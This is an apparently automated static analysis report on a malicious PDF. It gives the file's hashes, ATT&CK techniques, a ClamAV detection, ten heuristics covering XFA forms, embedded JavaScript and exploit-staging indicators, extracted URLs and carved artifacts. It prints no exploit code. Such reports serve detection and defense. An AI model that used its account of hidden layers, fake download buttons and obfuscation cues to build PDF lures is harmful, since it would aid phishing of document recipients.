Malicious PDF — malware analysis report

Static analysis result for SHA-256 09f0f49373ab8299…

MALICIOUS

PDF

775.5 KB Created: 2008-02-15 14:41:46 +01:00 Authoring application: AcroForm (via Adobe LiveCycle Designer ES 8.1)
MD5: 76b502521b13d3df9e88e621099ad3fb SHA-1: dec8ea6736f6444a8628f66dcd851150f734a11f SHA-256: 09f0f49373ab82990095e321cc4037c44887f53295e93590e9bc0f8d008cc4d7
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF file contains XFA forms and embedded JavaScript, which are known vectors for exploiting vulnerabilities in Adobe products. The JavaScript code attempts to trick the user into downloading an update by displaying an alert box, which redirects to 'http://cgi.adobe.com/special/acrobat/update'. This URL is likely a lure to download a secondary malicious payload. The ML classifier and ClamAV detection strongly indicate malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9443

Heuristics 10

  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • ClamAV: Pdf.Exploit.Agent-20192 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-20192
  • JavaScript action low PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Optional Content Group with action trigger low PDF_OPTIONAL_CONTENT
    Optional Content Group (layer) co-occurs with an action trigger — content can be selectively hidden from viewers or scanners while the action still fires on open
  • AcroForm button with action trigger low PDF_ACROFORM_BUTTON
    PDF contains a /Btn form field together with a SubmitForm/URI/Launch/JS trigger — this is the building block of fake 'Download' or 'Open' button overlays used in PDF phishing lures
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.monotype.comMonotype
    • http://ocsp.verisign.com0
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/xap/1.0/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/pdf/1.3/
    • http://ns.adobe.com/xfa/promoted-desc/
    • http://cgi.adobe.com/special/acrobat/update
    • http://ns.adobe.com/xdp/
    • http://www.xfa.org/schema/xci/1.0/
    • http://www.xfa.org/schema/xfa-template/2.4/
    • http://www.w3.org/1999/xhtml
    • http://www.xfa.org/schema/xfa-data/1.0/
    • http://www.xfa.org/schema/xfa-locale-set/2.1/
    • http://ns.adobe.com/xtd/
    • http://ns.adobe.com/xfdf/
    • http://www.xfa.org/schema/xfa-form/2.6/
    • http://www.monotype.com/html/mtname/ms_arial.htmlhttp://www.monotype.com/html/mtname/ms_welcome.htmlhttp://www.monotype.com/html/type/license.html
    • https://www.verisign.com/rpa
    • http://ocsp.verisign.com/ocsp/status0
    • https://www.verisign.com/rpa0
    • http://crl.microsoft.com/pki/crl/products/CodeSignPCA.crl0
    • http://www.microsoft.com/typography
    • http://crl.verisign.com/ThawteTimestampingCA.crl0
    • http://crl.verisign.com/tss-ca.crl0
    • https://www.verisign.com/rpa01
    • http://crl.verisign.com/pca3.crl0
    • http://CSC3-2004-crl.verisign.com/CSC3-2004.crl0D
    • http://CSC3-2004-aia.verisign.com/CSC3-2004-aia.cer0
    • http://www.adobe.com/typehttp://www.adobe.com/type/legal.html

Extracted artifacts 16

Files carved from inside the sample during analysis.

FilenameKindSourceSize
embedded_file_obj0304.bin
f7ee3ef2f8f35d669a6c2b8b0b0ee89655bbc3d04b107a8d22531830f6fc28a1		 pdf-embedded-file PDF EmbeddedFile object 304 at offset 0xA9789 86 bytes
embedded_file_obj0305.bin
539bb0dc3d533dea4997a7dc59e3c33ef624313c40e1dd953ba223d43bd3562a		 pdf-embedded-file PDF EmbeddedFile object 305 at offset 0xA983E 2013 bytes
embedded_file_obj0306.bin
c06222e209ce01b6bdc8cda23741aa5a2f6200cfb72e25ffc808d3b0c2a12942		 pdf-embedded-file PDF EmbeddedFile object 306 at offset 0xA9BBD 1025950 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
embedded_file_obj0307.bin
bac3e4de866ac1448036bb843b9b97f7525c1e48b40f0b6335cf6bfcf93c9858		 pdf-embedded-file PDF EmbeddedFile object 307 at offset 0xB804F 2415 bytes
embedded_file_obj0308.bin
454f05c5039ecbbf413e4412383dddc6944e0fb13ce7ce7fcb1515aef1d91819		 pdf-embedded-file PDF EmbeddedFile object 308 at offset 0xB8341 2014 bytes
embedded_file_obj0309.bin
500856001a9edb17a299f41c8b34871c12c85d56ec8eff03ef181fca24bb96b5		 pdf-embedded-file PDF EmbeddedFile object 309 at offset 0xB852F 200 bytes
embedded_file_obj0310.bin
56c83cc92abed3c964a609ef5c89c2f134f7a3d73de93e6af31d215141ad9110		 pdf-embedded-file PDF EmbeddedFile object 310 at offset 0xB8625 1218 bytes
embedded_file_obj0311.bin
2ebdd7efeaa1190ff6bad8cbd649b313e3969564018f204e7385b97c2fab1e19		 pdf-embedded-file PDF EmbeddedFile object 311 at offset 0xB8882 80 bytes
embedded_file_obj0312.bin
ad801486e3cb7389075fad83415aa12a315eba18ebcc5a81167104cfcb6fd70b		 pdf-embedded-file PDF EmbeddedFile object 312 at offset 0xB892D 63 bytes
javascript_obj1082_000.js
f574e4d51594d1a8fd22e125b109b827c437aa898edc78babb62dbb93f8744f8		 pdf-javascript-stream PDF /JS object 1082 at offset 0x1810 1532 bytes
javascript_obj1083_001.js
4a1aca004cf20431c9a66dce85404a6411a54d881a6c257882260ffc972a13eb		 pdf-javascript-stream PDF /JS object 1083 at offset 0x19FD 870 bytes
javascript_obj1084_002.js
42532e6508d5c2db0ab8c8dfcd630c448464119f6e0ad9b9d96e038b45e726fc		 pdf-javascript-stream PDF /JS object 1084 at offset 0x1B59 3792 bytes
stream_053_off0000b8f0.bin
d471946590249e9daf7aa91da1ce61ccfee32eef6886a8aa6e15902698f3d6c9		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0xB8F0 78969 bytes
stream_136_off00032685.bin
1e8564d3d89047875dccaa98279599de9d7ddf77240906041f1156ba8edf3315		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0x32685 352198 bytes
stream_139_off00074d2c.bin
b8e2518b116c26bab0e9f8c1672daf405dedad561157502b657e9005be2029aa		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0x74D2C 367087 bytes
font_01_sfnt_off00065197.bin
058d11642e857508126df5662db2c7af4bdc1892e73eea6fc33f2605a1fc3c20		 pdf-font-stream PDF embedded font (sfnt) at offset 0x65197 94875 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.